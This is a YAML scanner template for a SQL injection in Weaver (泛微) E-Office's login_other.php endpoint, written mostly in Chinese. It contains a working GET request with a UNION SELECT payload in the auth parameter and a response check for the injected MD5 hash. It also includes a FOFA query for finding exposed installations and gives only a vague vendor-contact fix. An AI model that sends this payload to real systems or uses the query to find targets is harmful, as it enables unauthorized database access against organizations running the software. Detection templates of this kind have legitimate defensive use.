product: 泛微 E-Office
vName: 泛微 E-Office login_other.phpSQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 泛微E-Office系统/E-mobile/Data/login_other.php?diff=sync&auth=存在sql注入漏洞
version: ''
note: ''
search:
  FOFA: app="泛微-EOffice"
protocol: http
link: https://cn-sec.com/archives/2840562.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /E-mobile/Data/login_other.php?diff=sync&auth={"auths":[{"value":"-1' UNION SELECT 1,2,md5(123456),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23"}]}
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - e10adc3949ba59abbe56e057f20f883e
            logic: and